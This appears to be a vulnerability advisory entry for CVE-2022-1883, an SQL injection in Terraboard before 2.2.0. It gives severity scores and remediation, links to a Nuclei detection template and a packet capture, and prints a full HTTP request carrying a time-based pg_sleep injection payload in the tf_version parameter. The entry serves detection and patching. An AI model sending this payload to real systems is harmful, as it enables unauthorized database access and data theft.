| Title | Terraboard <2.2.0 - SQL Injection |
|---|---|
| Author | edoardottt |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Upgrade Terraboard to version 2.2.0 or later to mitigate the SQL Injection vulnerability. |
| CVSS Score | 8.8 |
| EPSS Score | 0.6204 |
| CVE ID | CVE-2022-1883 |
| CWE ID | CWE-89 |
| Tags | time-based-sqli cve cve2022 terraboard sqli huntr camptocamp vkev vuln |
Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1883.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-1883.pcap
N/AN/A